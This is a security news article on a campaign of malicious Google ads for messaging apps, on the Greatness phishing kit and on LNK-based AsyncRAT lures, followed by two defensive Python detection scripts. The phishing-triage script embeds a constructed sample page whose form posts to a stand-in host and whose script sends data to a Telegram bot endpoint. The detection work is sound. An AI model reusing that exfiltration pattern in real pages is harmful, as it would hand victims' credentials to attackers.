
As part of an ongoing malvertising campaign, Chinese-speaking users have been targeted with malicious Google ads for restricted messaging apps like Telegram.
“Threat actors are abusing Google advertiser accounts to create malicious ads and point them to pages where unsuspecting users download remote administration Trojans (RATs),” Malwarebytes’ Jérôme Segura said in a report on Thursday. “Such programs allow the attacker to take full control of the victim’s computer and remove additional malware.”
It is worth noting that this activity, codenamed FakeAPP, is a continuation of the wave of attacks in late October 2023 against Hong Kong users searching for messaging applications such as WhatsApp and Telegram on search engines.
The latest version of the campaign adds LINE to the list of targeted messaging apps, redirecting users to Google Docs or fake websites hosted on Google Sites.

Google infrastructure is used to embed links to other websites controlled by threat actors in order to deliver malicious installer files that ultimately deploy Trojans such as PlugX and Gh0st RAT.
Malwarebytes said it traced the fraudulent ads to two advertiser accounts based in Nigeria, Interactive Communication Team Limited and Ringier Media Bulgaria Limited.
“Threat actors appear to be prioritizing quantity over quality by constantly pushing new payloads and infrastructure as command and control,” Segura said.
The development comes as Trustwave SpiderLabs revealed a surge in the use of a phishing-as-a-service (PhaaS) platform called Greatness, which is used to create legitimate-looking credential collection pages targeting Microsoft 365 users.

“The toolkit allows for personalization of sender name, email address, subject, message, attachment and QR code, thereby enhancing relevancy and engagement,” the company said, adding that it is equipped with anti-detection measures, such as random headers, encoding and obfuscation, designed to bypass spam filters and security systems.
Greatness is sold to other criminals for $120 per month, effectively lowering the barrier to entry and helping them conduct large-scale attacks.
The attack chain involves sending phishing emails with malicious HTML attachments. When recipients open these attachments, they are directed to a fake login page that captures the entered credentials and exfiltrates them to the threat actors via Telegram.
Other infection sequences use attachments to drop malware on victims’ computers to facilitate information theft.
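The attack chain above (an HTML attachment that renders a lookalike sign-in form and ships the captured fields to Telegram) can be triaged on the mail gateway before a user ever opens it. The following Python script is an added example, not code from the article, Trustwave or any kit; the sample attachments it inspects are constructed for illustration, and the scoring thresholds are assumptions. It uses only the standard library and looks for the three traits the article names: a password field, a form posting to an external host, and a reference to the Telegram Bot API.

```python
import re
from html.parser import HTMLParser

# Constructed sample of a credential-harvesting HTML attachment (not a real
# Greatness artefact): a lookalike sign-in form whose script posts the
# captured fields to a Telegram bot endpoint. The token is a placeholder.
SAMPLE_PHISH_HTML = """
<html><head><title>Sign in to your account</title></head>
<body>
<img src="https://example.invalid/ms365-logo.png">
<form id="login" action="https://bad-example.invalid/post.php" method="post">
  <input type="email" name="loginfmt" placeholder="Email">
  <input type="password" name="passwd" placeholder="Password">
  <button type="submit">Sign in</button>
</form>
<script>
var token = "PLACEHOLDER_BOT_TOKEN";
fetch("https://api.telegram.org/bot" + token + "/sendMessage", {method: "POST"});
</script>
</body></html>
"""

# Constructed benign attachment for comparison.
SAMPLE_BENIGN_HTML = """
<html><body><h1>Quarterly report</h1><p>See attached figures.</p>
<a href="https://example.com/report.pdf">Download</a></body></html>
"""


class _Collector(HTMLParser):
    """Collect password inputs, form targets and inline script text."""

    def __init__(self):
        super().__init__()
        self.password_inputs = 0
        self.form_actions = []
        self.script_text = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_inputs += 1
        elif tag == "form":
            self.form_actions.append(a.get("action") or "")
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.script_text.append(data)


TELEGRAM_API = re.compile(r"api\.telegram\.org/bot", re.I)
URL_RE = re.compile(r"https?://[^\s\"'<>()]+", re.I)


def triage_html_attachment(html: str) -> dict:
    """Return heuristic indicators that an HTML attachment harvests credentials.

    Weights are assumed values for this example, not a vendor's scoring.
    """
    c = _Collector()
    c.feed(html)
    external_post = [u for u in c.form_actions if u.lower().startswith("http")]
    findings = {
        "password_form": c.password_inputs > 0,
        "external_form_action": external_post,
        "telegram_exfil": bool(TELEGRAM_API.search(html)),
        "urls": sorted(set(URL_RE.findall(html))),
    }
    score = 0
    if findings["password_form"]:
        score += 2          # a sign-in form inside a mail attachment is unusual
    if findings["external_form_action"]:
        score += 1          # credentials leave the attachment for another host
    if findings["telegram_exfil"]:
        score += 3          # Bot API reference matches the exfil channel described
    findings["score"] = score
    findings["verdict"] = "suspicious" if score >= 3 else "benign"
    return findings


if __name__ == "__main__":
    for label, doc in (("phish", SAMPLE_PHISH_HTML), ("benign", SAMPLE_BENIGN_HTML)):
        print(label, triage_html_attachment(doc))
```

Run it as a filter over attachments whose MIME type is text/html; anything reaching "suspicious" is quarantined for analyst review rather than delivered. The Telegram check is deliberately run over the whole document, not just script blocks, because kits also hide the endpoint in encoded strings and form attributes.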

To increase the likelihood of a successful attack, emails spoof trusted sources such as banks and employers and induce a false sense of urgency using subjects such as “Urgent invoice payment” or “Urgent account verification required.”
“The number of victims is currently unknown, but Greatness is widely used and well supported, and its own Telegram community provides information on how to operate the toolkit, as well as other tips and tricks,” Trustwave said.

Phishing attacks have also been observed targeting Korean companies using lures impersonating technology companies such as Kakao, distributing AsyncRAT through malicious Windows shortcut (LNK) files.
“Malicious shortcut files disguised as legitimate files are continuing to spread,” said the Security Intelligence Center (ASEC). “Users may mistake shortcut files for regular documents because the ‘.LNK’ extension is not visible in the file name.”
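Because Explorer hides the .lnk suffix, a file named invoice.pdf.lnk is displayed as invoice.pdf; a gateway or endpoint scanner should therefore judge an attachment by its content, not its name. The Python script below is an added example, not ASEC's or the article's code: it recognises a Windows shell link by the fixed 20-byte header prefix (HeaderSize 0x4C followed by the LinkCLSID), then flags names that pair a document-looking extension with .lnk, and content that is a shell link with no .lnk extension at all. The sample files are constructed byte strings and the document-extension list is an assumption.

```python
# Fixed 20-byte prefix of a Windows Shell Link file: HeaderSize 0x0000004C
# followed by the LinkCLSID {00021401-0000-0000-C000-000000000046} in its
# on-disk (little-endian) layout.
LNK_MAGIC = bytes.fromhex("4c000000" "01140200" "00000000" "c000000000000046")

# Extensions a user would read as a harmless document (assumed list).
DOC_EXTENSIONS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".hwp", ".txt", ".jpg", ".png"}


def is_lnk_content(data: bytes) -> bool:
    """True if the bytes start with a shell-link header, regardless of name."""
    return data[:20] == LNK_MAGIC


def displayed_name(filename: str) -> str:
    """Name as Explorer shows it: the .lnk suffix is hidden for shortcut files."""
    return filename[:-4] if filename.lower().endswith(".lnk") else filename


def classify_attachment(filename: str, data: bytes) -> str:
    """Classify an attachment by comparing its name against its real content.

    Returns one of:
      "not_lnk"              - content is not a shell link
      "lnk_plain"            - a .lnk file named as one (e.g. notes.lnk)
      "lnk_double_extension" - shell link named like a document (invoice.pdf.lnk)
      "lnk_content_mismatch" - shell link bytes but no .lnk extension at all
    """
    if not is_lnk_content(data):
        return "not_lnk"
    parts = filename.lower().rsplit(".", 2)   # "invoice.pdf.lnk" -> ["invoice", "pdf", "lnk"]
    if parts[-1] != "lnk":
        return "lnk_content_mismatch"
    if len(parts) == 3 and "." + parts[-2] in DOC_EXTENSIONS:
        return "lnk_double_extension"
    return "lnk_plain"


def _fake_lnk() -> bytes:
    # Constructed: the 76-byte ShellLinkHeader with only the magic filled in,
    # which is all the content check needs.
    return LNK_MAGIC + b"\x00" * (76 - len(LNK_MAGIC))


# Constructed sample attachments (name -> bytes).
SAMPLES = {
    "invoice.pdf.lnk": _fake_lnk(),           # masquerade the article describes
    "photo.jpg": _fake_lnk(),                 # link bytes behind a plain image name
    "notes.lnk": _fake_lnk(),                 # ordinary shortcut
    "report.pdf": b"%PDF-1.7\n%constructed\n",  # genuine document
}


def scan(samples: dict) -> dict:
    """Classify every sample; verdicts other than not_lnk/lnk_plain warrant a block."""
    return {name: classify_attachment(name, data) for name, data in samples.items()}


if __name__ == "__main__":
    for name, verdict in scan(SAMPLES).items():
        print(f"{name:20} shown as {displayed_name(name):16} -> {verdict}")
```

The content check is what matters: renaming or double-extension tricks change only the name, while the header bytes are what Windows uses to treat the file as a shortcut.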